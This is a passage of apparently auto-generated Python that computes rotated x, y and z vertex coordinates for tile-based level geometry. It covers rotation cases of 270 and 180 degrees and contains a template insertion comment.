x56 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[0])
y56 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[1])
z56 = level*448 + 64
x57 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[0])
y57 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[1])
z57 = level*448 + 64
x58 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y58 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z58 = level*448 + 309
x59 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y59 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z59 = level*448 + 64
x60 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[0])
y60 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[1])
z60 = level*448 + 64
x61 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 270)[0])
y61 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 270)[1])
z61 = level*448 + 64
x62 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y62 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z62 = level*448 + 64
x63 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y63 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z63 = level*448 + 309
x64 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y64 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z64 = level*448 + 309
x65 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y65 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z65 = level*448 + 64
x66 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y66 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z66 = level*448 + 64
x67 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 270)[0])
y67 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 270)[1])
z67 = level*448 + 309
x68 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y68 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z68 = level*448 + 309
x69 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y69 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z69 = level*448 + 309
x70 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[0])
y70 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[1])
z70 = level*448 + 64
x71 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y71 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z71 = level*448 + 64
x72 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y72 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z72 = level*448 + 64
x73 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[0])
y73 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[1])
z73 = level*448 + 309
x74 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[0])
y74 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 270)[1])
z74 = level*448 + 64
x75 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 270)[0])
y75 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 270)[1])
z75 = level*448 + 64
x76 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y76 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z76 = level*448 + 309
x77 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y77 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z77 = level*448 + 64
x78 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y78 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z78 = level*448 + 64
x79 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y79 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z79 = level*448 + 64
x80 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y80 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z80 = level*448 + 64
x81 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y81 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z81 = level*448 + 309
x82 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y82 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z82 = level*448 + 309
x83 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y83 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z83 = level*448 + 309
x84 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y84 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z84 = level*448 + 309
x85 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y85 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z85 = level*448 + 64
x86 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[0])
y86 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 270)[1])
z86 = level*448 + 64
x87 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y87 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z87 = level*448 + 64
x88 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y88 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z88 = level*448 + 309
x89 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y89 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z89 = level*448 + 64
x90 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y90 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z90 = level*448 + 64
x91 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y91 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z91 = level*448 + 64
x92 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y92 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z92 = level*448 + 64
x93 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y93 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z93 = level*448 + 309
x94 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y94 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z94 = level*448 + 309
x95 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y95 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z95 = level*448 + 64
x96 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y96 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z96 = level*448 + 64
x97 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y97 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z97 = level*448 + 309
x98 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y98 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z98 = level*448 + 64
x99 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y99 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z99 = level*448 + 64
x100 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y100 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z100 = level*448 + 309
x101 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[0])
y101 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 270)[1])
z101 = level*448 + 64
x102 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y102 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z102 = level*448 + 64
x103 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[0])
y103 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 270)[1])
z103 = level*448 + 309
x104 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y104 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z104 = level*448 + 309
x105 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y105 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z105 = level*448 + 309
x106 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[0])
y106 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 270)[1])
z106 = level*448 + 64
x107 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y107 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z107 = level*448 + 64
x108 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y108 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z108 = level*448 + 64
x109 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y109 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z109 = level*448 + 309
x110 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y110 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z110 = level*448 + 64
x111 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y111 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z111 = level*448 + 64
x112 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 270)[0])
y112 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 270)[1])
z112 = level*448 + 64
x113 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y113 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z113 = level*448 + 64
x114 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y114 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z114 = level*448 + 309
x115 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y115 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z115 = level*448 + 64
x116 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[0])
y116 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[1])
z116 = level*448 + 64
x117 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[0])
y117 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[1])
z117 = level*448 + 309
x118 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[0])
y118 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[1])
z118 = level*448 + 309
x119 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[0])
y119 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[1])
z119 = level*448 + 64
x120 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y120 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z120 = level*448 + 64
x121 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y121 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z121 = level*448 + 309
x122 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[0])
y122 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 270)[1])
z122 = level*448 + 309
x123 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y123 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z123 = level*448 + 309
x124 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y124 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z124 = level*448 + 64
x125 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 270)[0])
y125 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 270)[1])
z125 = level*448 + 64
x126 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y126 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z126 = level*448 + 64
x127 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y127 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z127 = level*448 + 309
x128 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[0])
y128 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 270)[1])
z128 = level*448 + 64
x129 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[0])
y129 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 270)[1])
z129 = level*448 + 64
x130 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y130 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z130 = level*448 + 309
x131 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y131 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z131 = level*448 + 64
x132 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 270)[0])
y132 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 270)[1])
z132 = level*448 + 64
#INSERT_ROT_1_PY_LIST
elif rotation == 2:
x1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z1 = level*448 + 64
x2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[0])
y2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[1])
z2 = level*448 + 64
x3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
z3 = level*448 + 64
x4 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[0])
y4 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[1])
z4 = level*448 + 0
x5 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y5 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
z5 = level*448 + 0
x6 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[0])
y6 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[1])
z6 = level*448 + 0
x7 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y7 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z7 = level*448 + 64
x8 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[0])
y8 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[1])
z8 = level*448 + 64
x9 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[0])
y9 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[1])
z9 = level*448 + 0
x10 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[0])
y10 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[1])
z10 = level*448 + 0
x11 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y11 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
z11 = level*448 + 0
x12 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y12 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
z12 = level*448 + 64
x13 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[0])
y13 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[1])
z13 = level*448 + 64
x14 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y14 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z14 = level*448 + 64
x15 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y15 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z15 = level*448 + 0
x16 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y16 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
z16 = level*448 + 0
x17 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[0])
y17 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[1])
z17 = level*448 + 0
x18 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[0])
y18 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[1])
z18 = level*448 + 64
x19 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[0])
y19 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[1])
z19 = level*448 + 64
x20 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[0])
y20 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[1])
z20 = level*448 + 64
x21 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[0])
y21 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[1])
z21 = level*448 + 309
x22 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[0])
y22 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[1])
z22 = level*448 + 64
x23 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[0])
y23 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[1])
z23 = level*448 + 64
x24 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[0])
y24 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[1])
z24 = level*448 + 309
x25 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[0])
y25 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[1])
z25 = level*448 + 309
x26 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[0])
y26 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[1])
z26 = level*448 + 309
x27 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[0])
y27 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[1])
z27 = level*448 + 309
x28 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[0])
y28 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[1])
z28 = level*448 + 64
x29 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[0])
y29 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[1])
z29 = level*448 + 64
x30 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[0])
y30 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[1])
z30 = level*448 + 64
x31 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y31 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
z31 = level*448 + 64
x32 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[0])
y32 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[1])
z32 = level*448 + 64
x33 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[0])
y33 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[1])
z33 = level*448 + 309
x34 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[0])
y34 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[1])
